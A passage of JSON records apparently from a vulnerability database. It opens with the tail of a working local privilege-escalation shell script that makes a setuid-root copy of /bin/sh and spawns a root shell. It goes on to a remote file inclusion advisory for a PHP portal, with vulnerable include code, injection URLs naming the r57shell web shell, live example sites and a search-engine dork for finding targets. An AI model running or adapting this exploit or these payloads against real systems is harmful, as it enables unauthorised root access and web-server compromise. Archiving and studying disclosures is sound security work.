!= 0 ]; then\r\n echo \"Compilation of shell failed\"\r\n echo \"Trying backup method...\"\r\n run_cmd \"cp /bin/sh $SH && chmod 4755 $SH\"\r\n while (true); do\r\n if [ -u $SH ]; then\r\n $SH \r\n cleanup\r\n exit\r\n else\r\n sleep 1\r\n fi\r\n done\r\n echo \"Failed\"\r\n cleanup\r\n exit 1\r\n fi\r\n fi\r\n rm -f $SH_C \r\n\r\n run_cmd \"chown root:root $SH && chmod 4755 $SH\"\r\n\r\n # wait for our shell to be chmod'd\r\n SUCCESS=0\r\n echo \"Waiting for suid shell\"\r\n for sleep in `seq 1 60`; do\r\n if [ -u $SH ]; then\r\n echo \"Success! setuid shell is $SH\"\r\n SUCCESS=1\r\n break\r\n else\r\n sleep 2\r\n fi\r\n done\r\n\r\n if [ $SUCCESS == 1 ]; then\r\n cleanup\r\n $SH\r\n else \r\n rm -f $SH\r\n echo \"Exploit failed!\"\r\n cleanup\r\n exit 1\r\n fi\r\n}\r\n\r\nCLIENT=\"/tmp/NetClient/client\"\r\n\r\nif [ -f $CLIENT ]; then\r\n echo \"client $CLIENT already exists -- forcing stop\"\r\n $CLIENT --stop\r\n for sleep in `seq 1 60`; do\r\n if [ ! -f $CLIENT ]; then\r\n break\r\n fi\r\n sleep 1\r\n done\r\nfi\r\n\r\n# hack to figure out where temp files get put...\r\nTMP_FILE=`mktemp -t $$`\r\nTMP_DIR=`dirname $TMP_FILE`\r\nrm -f $TMP_FILE\r\n\r\ntrap cleanup 1 2 3 15\r\n\r\n# two modes of operation -- get a root shell, or run a cmd as root.\r\nif [ -z \"$1\" ]; then\r\n suid_shell\r\nelse \r\n run_cmd $1 \r\nfi\r\n\r\ncleanup\r\n\r\n\r\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/7633"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "description": "Ahhp-Portal Remote File Inclusion\r\n\r\n\r\nS\u042dTE:www.ahhope.org\r\n\r\nDemo:http://xinan.ahtcm.edu.cn\r\nDemo2http://www.hfspaq.gov.cn\r\n\r\n\r\nVul Code:\r\n\r\n <?\r\n\t\tif 
($sc=='')\r\n\t\t\tinclude($fp.".php");\r\n\t\telse\r\n\t\t\tinclude($sc."/".$fp.".php");\t\r\n\t\t?>\r\n\r\n\r\n------------------------------------------------\r\n\r\nexample:\r\n\r\nhttp://site/page.php?fp=r57shell?\r\nhttp://site/page.php?sc=r57shell?\r\n\r\n\r\n////////////////////////////////////////////////////\r\n\r\nCredit : CodeXpLoder'tq\r\n\r\nmail : codexploder[at]hotmail[dot]com\r\n\r\nsite : expw0rm.com\r\n\r\n###############################################\r\n\r\nGoogle :\r\n\r\n"page.php?fp"\r\n\r\n// Exploit Worm www.expw0rm.com", "modified": "2007-04-25T00:00:00", "published": "2007-04-25T00:00:00", "id": "SECURITYVULNS:DOC:16838", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16838", "title": "Ahhp(php)-Portal Remote File Inclusion", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-04-25T00:00:00", "published": "2007-04-25T00:00:00", "id": "SECURITYVULNS:VULN:7633", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7633", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}